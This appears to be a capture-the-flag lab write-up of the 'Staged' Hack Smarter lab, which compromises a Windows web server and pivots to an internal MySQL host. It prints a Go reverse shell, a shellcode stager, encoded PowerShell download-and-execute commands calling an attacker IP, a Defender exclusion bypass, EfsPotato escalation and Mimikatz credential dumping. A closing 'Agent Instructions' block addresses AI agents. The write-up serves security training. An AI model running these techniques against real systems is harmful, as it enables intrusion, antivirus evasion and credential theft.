# Staged {% embed url="" %} The following post by 0xb0b is licensed under [CC BY 4.0

](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1) *** ## Scenario ### Objective / Scope You are a member of the **Hack Smarter Red Team** and have been assigned to perform a black-box penetration test against a client's critical infrastructure. The scope is strictly limited to the following hostnames: * **web.hacksmarter:** Public-facing Windows Web Server (Initial Access Point). **Windows Defender is enabled.** * **sqlsrv.hacksmarter:** Internal Linux MySQL Database Server. The exercise is considered **complete** upon successfully retrieval the final flag from `sqlsrv.hacksmarter` Any activity outside of these two hosts or their associated network interfaces is strictly prohibited. **Lab Starting Point** During the beginning of the engagement, another operator exploited a file upload vulnerability, and they have provided you with a web shell. `http://web.hacksmarter/hacksmarter/shell.php?cmd=whoami` ## Summary

Summary - NonSliverC2 Approach

In Staged we begin with a pre-established web shell on a public-facing Windows server and weaponize it to deploy an undetected Go-based reverse shell, establishing stable command execution as `j.smith`. Enumerating privileges reveals `SeImpersonatePrivilege`, enabling exploitation through EfsPotato to escalate to `NT AUTHORITY\SYSTEM`. With full system privileges, we bypass Windows Defender restrictions, execute Mimikatz, and extract NTLM hashes for multiple users, successfully cracking credentials for `p.richardson`. To pivot into the internal network, we deploy Ligolo-ng to tunnel traffic through the compromised web server and access the internal MySQL server. Authenticating as `p.richardson`, we enumerate the `hacksmart_db` database and retrieve the final flag from the `final_config` table, completing full compromise of the target environment through privilege escalation, credential extraction, and network pivoting.

## Recon We use rustscan `-b 500 -a web.hacksmarter -- -sC -sV -Pn` to enumerate all TCP ports on the target machine, piping the discovered results into Nmap which runs default NSE scripts `-sC`, service and version detection `-sV`, and treats the host as online without ICMP echo `-Pn`. A batch size of `500` trades speed for stability, the default `1500` balances both, while much larger sizes increase throughput but risk missed responses and instability. ``` rustscan -b 500 -a web.hacksmarter -- -sC -sV -Pn ```

Among the open ports, we have ports `80`, `443`, and `3389`.

We run rustscan on `sqlsrv.hacksmarter` with `-b 500 -a sqlserver.hacksmarter -- -sC -sV -Pn` too to enumerate all TCP ports on the target machine, piping the discovered results into Nmap which runs default NSE scripts `-sC`, service and version detection `-sV`, and treats the host as online without ICMP echo `-Pn`. A batch size of `500` trades speed for stability, the default `1500` balances both, while much larger sizes increase throughput but risk missed responses and instability. But only have port 22 available asdescribed in the scenario. ``` rustscan -b 500 -a sqlsrv.hacksmarter -- -sC -sV -Pn ```

## Non-SliverC2 Approach ### Shell as j.smith on web.hacksmarter As described in the scenario we already have a web shell available at `http://web.hacksmarter/hacksmarter/shell.php?cmd=`. We test these and have access as `j.smith`. ``` curl 'http://web.hacksmarter/hacksmarter/shell.php?cmd=whoami' ```

We know from the scenario that Windows Defender is active. For a more interactive shell, we use our go reverse shell, which has remained undetected so far. {% code title="0xb0b.go" overflow="wrap" lineNumbers="true" %} ```go package main import ( "net" "os/exec" ) func main() { c, _ := net.Dial("tcp", "10.200.24.50:443") cmd := exec.Command("powershell") cmd.Stdin = c cmd.Stdout = c cmd.Stderr = c cmd.Run() } ``` {% endcode %} We compile the reverse shell as follows on our Exegol instance: ``` GOOS=windows GOARCH=amd64 CGO_ENABLED=0 go build -o 0xb0b.exe 0xb0b.go ```

Next, we run a listener to catch the reverse shell. For this purpose we use Penelope: {% embed url="" %} ``` penelope -p 443 ```

Next, we prepare a Powershell payload that downloads our reverse shell from our web server and then executes it. We encode this payload so that we don't encounter any problems with the web shell during execution with regard to special characters, etc. {% code overflow="wrap" %} ``` printf '%s' 'IWR http://10.200.24.50/0xb0b.exe -OutFile $env:TEMP\0xb0b.exe; Start-Process $env:TEMP\0xb0b.exe' \ | iconv -f UTF-8 -t UTF-16LE \ | base64 -w 0 ``` {% endcode %} We'll receive the following base64 encoded command. {% code overflow="wrap" %} ``` SQBXAFIAIABoAHQAdABwADoALwAvADEAMAAuADIAMAAwAC4AMgA0AC4ANQAwAC8AMAB4AGIAMABiAC4AZQB4AGUAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGUAbgB2ADoAVABFAE0AUABcADAAeABiADAAYgAuAGUAeABlADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AFQARQBNAFAAXAAwAHgAYgAwAGIALgBlAHgAZQA= ``` {% endcode %} Next, we run a python web server. ``` python -m http.server 80 ``` With the web server and Penelope listener prepared, we execute the payload. {% code overflow="wrap" %} ``` curl 'http://web.hacksmarter/hacksmarter/shell.php?cmd=powershell.exe+-e+SQBXAFIAIABoAHQAdABwADoALwAvADEAMAAuADIAMAAwAC4AMgA0AC4ANQAwAC8AMAB4AGIAMABiAC4AZQB4AGUAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGUAbgB2ADoAVABFAE0AUABcADAAeABiADAAYgAuAGUAeABlADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AFQARQBNAFAAXAAwAHgAYgAwAGIALgBlAHgAZQA=' ``` {% endcode %}

The reverse shell gets downloaded,...

..., and we receive a connection back to our listener.

### Shell as NT AUTHORITY/SYSTEM on web.hacksmarter We check which privileges are set for the user and see that `SeImpersonatePrivilege` is enabled. The `SeImpersonatePrivilege` is a powerful Windows privilege that allows a user or process to impersonate another user's security context. There are several potato exploits for this.

Since the AV is very strict, we try the EfsPotato exploit. This needs to be compiled on the target system. {% embed url="" %} We look for a `csc` compiler on the machine at `C:\Windows\Microsoft.Net\Framework\`... ``` ls C:\Windows\Microsoft.Net\Framework\ ```

... and have one ready at: ``` C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe ``` We download the source of the EfsPotato exploit. ``` curl http://10.200.24.50/EfsPotato.cs -o ./EfsPotato.cs ``` To compile the binary we issue the following command like suggested in the repository. {% code overflow="wrap" %} ``` C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe /platform:x86 EfsPotato.cs -nowarn:1691,618 ``` {% endcode %}

Next, we want to use the exploit to run our reverse shell in the context of NT AUTHORITY/SYSTEM. The binary is located in `C:\Users\j.smith\AppData\Local\Temp\0xb0b.exe`

We issue the following command to execute the reverse shell binary in the context of NT Authority System. Since we use Penelope, we don't have to go to the trouble of creating, uploading, and executing a new reverse shell with a different port and a different listener. The Penelope listener recognizes a new connection on the same port and automatically creates a new session. In this case, `session 2`. Using `CTRL+D`, we detach our session and switch to session 2 using the `session` command. We are now NT AUTHORITY/SYSTEM. ``` .\EfsPotato.exe "cmd.exe /C C:\Users\j.smith\AppData\Local\Temp\0xb0b.exe" ```

From our initial enumeration, we find not only `j.smith` but also users `b.morgan` and `p.richardson`.

Since we are NT Authority System we try to run Mimikatz to extract all available credentials from the LSASS memory. Defender is enabled, so the execution of Mimikatz gets prevented and the file deleted. We try to disable the `RealtimeMonitoring`, but without success. ``` Set-MpPreference -DisableRealtimeMonitoring $true ``` But setting an exception path seems to work. ``` Add-MpPreference -ExclusionPath C:\Users\j.smith ``` Next, we download and execute Mimikatz. ``` curl http://10.200.24.50/mimikatz.exe -o ./mimikatz.exe ``` ``` ./mimikatz.exe ``` We elevate privileges to SYSTEM level and... ``` privilege::debug ``` ... try to extract all available credentials from LSASS memory. We are able to retrieve the NTLM hashes of `p.richardson` and `j.smith` ``` sekurlsa::logonpasswords ``` A clear cheat sheet for Mimikatz can be found here: {% embed url="" %}

We try to crack the NTLM hashes and are successful for the user `p.richardson`. ``` hashcat -a0 -m 1000 'REDACTED' /usr/share/wordlists/rockyou.txt --show ```

Now that we have a username and password, we can try to access the SQL Server. Since we are restricted by segmentation and may not be able to reach all services of the `sqlsrv.hacksmarter` machine from our attacker machine, we set up a tunnel using Ligolo. ### Ligolo-ng Setup For the subsequent phases, we use Ligolo to relay traffic between the target machine and our attacker machine to make the internal reachable networks of the target machine accessible to our attacker machine. > **Ligolo-ng** is a *simple*, *lightweight* and *fast* tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a **tun interface** (without the need of SOCKS). First, we start the proxy server and set up a TUN (network tunnel) interface called `staged` and configuring routes to forward traffic for specific IP ranges (`240.0.0.1`, `10.0.18.213/32`) through the tunnel. ``` sudo ./proxy -selfcert ``` ``` ifcreate --name staged ``` ``` route_add --name staged --route 240.0.0.1/32 ``` ``` route_add --name staged --route 10.0.18.213/32 ```

Next, we download and run the agent on the target machine. ``` curl http://10.200.24.50/agent.exe -o ./agent.exe ``` ``` ./agent -connect 10.200.24.50:11601 --ignore-cert ```

We get a message on our Ligolo-ng proxy that an agent has joined. We use `session` to select the session and then `tunnel_start --tun staged` to run the tunnel. We are now able to to reach out to `10.0.18.213/32` fully. ``` session ``` ``` tunnel_start --tun staged ```

### Recon on sqlsrv.hacksmarter We rerun our rustscan and are able to detect the open port `3306`. ``` rustscan -b 500 -a sqlsrv.hacksmarter -- -sC -sV -Pn ```

### Access as p.richardson on sqlsrv.hacksmarter We try to connect to the sql service using the credentials found before and gain access. ``` mysql -h sqlsrv.hacksmarter -u p.richardson -p ``` The database enumeration reveals `hacksmart_db`, containing the `final_config` table where the final flag is stored. ``` select * from final_config; ```

## SliverC2 Approach The following section describes an approach using SliverC2. Here, we will use a custom stager, which is a modification of the nim stager from the SliverC2 course of Tyler Ramsbey and is written in Go instead. Using this stager, we want to initially bypass detection by the Defender because it leverages a lesser-known programming language. Furthermore it executes the payload directly from memory to evade file-based and behavioral analysis. From the gained session we try to use the SliverC2 Framework with all its possibilities. I am still learning SliverC2 myself and cannot guarantee the most elegant, evasive solution. ### Shell as j.smith on web.hacksmarter #### Prepare a custom stager First we need to prepare the stager. The stager fetches raw shellcode from a chosen url and loads it directly into memory as bytes. The payload is not embedded in the binary, allowing it to be changed without recompiling. It calls `VirtualAlloc` to reserve and commit memory with execute, read, and write permissions, then copies the downloaded shellcode into that memory using unsafe pointer operations. The execution is transferred to the allocated memory address using `syscall.Syscall`, handing control to the shellcode. {% code title="stager.go" overflow="wrap" lineNumbers="true" expandable="true" %} ```go // +build windows package main import ( "io" "net/http" "syscall" "unsafe" ) var ( kernel32 = syscall.NewLazyDLL("kernel32.dll") procVirtualAlloc = kernel32.NewProc("VirtualAlloc") ) const ( MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_EXECUTE_READWRITE = 0x40 ) func downloadShellcode(url string) ([]byte, error) { resp, err := http.Get(url) if err != nil { return nil, err } defer resp.Body.Close() return io.ReadAll(resp.Body) } func executeShellcode(shellcode []byte) { addr, _, err := procVirtualAlloc.Call( 0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE, ) if addr == 0 { panic(err) } // Copy shellcode into allocated memory for i := 0; i < len(shellcode); i++ { *(*byte)(unsafe.Pointer(addr + uintptr(i))) = shellcode[i] } // Execute shellcode syscall.Syscall(addr, 0, 0, 0, 0) } func main() { url := "http://10.200.24.50/shellc.bin" shellcode, err := downloadShellcode(url) if err != nil { panic(err) } executeShellcode(shellcode) } ``` {% endcode %} We compile the stager as follows on our exegol instance: ``` GOOS=windows GOARCH=amd64 CGO_ENABLED=0 go build -o stager.exe stager.go ```

#### Generate shell code {% hint style="info" %} During generation without the `-G` tag, which disables the encoder, no shellcode could be successfully generated. The resulting shellcode was always empty. This may be related to the underlying architecture on which I am operating, namely ARM: {% endhint %} Next, we need to generate the shell code. We do this as follows: {% code overflow="wrap" %} ``` generate --mtls 10.200.24.50:443 --os windows --arch amd64 --format shellcode -G --save /workspace/hacksmarter/staged/shellc.bin ``` {% endcode %}

#### Setup listener We set up the listener. ``` mtls --lhost 10.200.24.50 --lport 443 ```

#### Run web server And run a web server from which the stager and the shellcode can be fetched. ``` python3 -m http.server 80 ```

#### Download and execute stager As before, we prepare the payload for downloading and executing the stager. We encode this payload so that we don't encounter any problems with the web shell during execution with regard to special characters, etc. {% code overflow="wrap" %} ``` printf '%s' 'IWR http://10.200.24.50/stager.exe -OutFile $env:TEMP\stager.exe; Start-Process $env:TEMP\stager.exe' \ | iconv -f UTF-8 -t UTF-16LE \ | base64 -w 0 ``` {% endcode %}

We'll receive the following base64 encoded command. {% code overflow="wrap" %} ``` SQBXAFIAIABoAHQAdABwADoALwAvADEAMAAuADIAMAAwAC4AMgA0AC4ANQAwAC8AcwB0AGEAZwBlAHIALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcwB0AGEAZwBlAHIALgBlAHgAZQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBUAEUATQBQAFwAcwB0AGEAZwBlAHIALgBlAHgAZQA= ``` {% endcode %} With the web server prepared, we execute the payload. {% code overflow="wrap" %} ``` curl 'http://web.hacksmarter/hacksmarter/shell.php?cmd=powershell.exe+-e+SQBXAFIAIABoAHQAdABwADoALwAvADEAMAAuADIAMAAwAC4AMgA0AC4ANQAwAC8AcwB0AGEAZwBlAHIALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgACQAZQBuAHYAOgBUAEUATQBQAFwAcwB0AGEAZwBlAHIALgBlAHgAZQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAZQBuAHYAOgBUAEUATQBQAFwAcwB0AGEAZwBlAHIALgBlAHgAZQA=' ``` {% endcode %}

We see that the stager and the shellcode gets downloaded...

... and executed. We receive a session in SliverC2. ``` sessions ``` ``` sessions -i b7036489 ```

Without spawning a shell we can retrieve the current user and the privileges. We have `SeImpersonatePrivilege` enabled. ``` whoami ``` ``` getprivs ```

### Shell as NT AUTHORITY/SYSTEM on web.hacksmarter {% hint style="info" %} Unfortunately, I couldn't find a tool in Armory that conveniently uses this privilege, so I used the same approach as before with EfsPotato. {% endhint %} {% embed url="" %} We upload the source... ``` upload EfsPotato.cs ```

... and compile the exploit {% code overflow="wrap" %} ``` execute cmd.exe -- /c "C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe /platform:x86 /out:C:\xampp\htdocs\hacksmarter\EfsPotato.exe C:\xampp\htdocs\hacksmarter\EfsPotato.cs" ``` {% endcode %}

Next, we use the EfsPotato exploit to run our stager as `NT AUTHORITY SYSTEM`. We receive a session. ``` execute EfsPotato.exe "cmd.exe /C C:\Users\j.smith\AppData\Local\Temp\stager.exe" ``` ``` sessions -i ed9842b0 ```

Inside that session we can run mimikatz, a tool downloaded using armory. Although Defender is active, we can use this, but it kills our session after execution. Still, it's enough to harvest valuable credentials. ``` mimikatz -- sekurlsa::logonpasswords ```

We try to crack the NTLM hashes and are successful for the user `p.richardson`. ``` hashcat -a0 -m 1000 'REDACTED' /usr/share/wordlists/rockyou.txt --show ```

Now that we have a username and password, we can try to access the SQL Server. ### Access as p.richardson on sqlsrv.hacksmarter Instead of setting up Ligolo-ng we issue `socks5 start` to launch a local SOCKS5 proxy that tunnels traffic through our active session. ``` socks5 start ```

Next, we can use proxychains to reach out to `sqlsrv.hacksmarter`. ``` proxychains nmap -sT -Pn -n -p 22,3306 sqlsrv.hacksmarter ```

Via proxychains we are now able to connect to the SQL service on port 3306 with the credentials of `p.richardson` and find the final flag. ``` proxychains -q mysql -h sqlsrv.hacksmarter -u p.richardson -p ```

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xb0b.gitbook.io/writeups/hack-smarter-labs/2025/staged.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.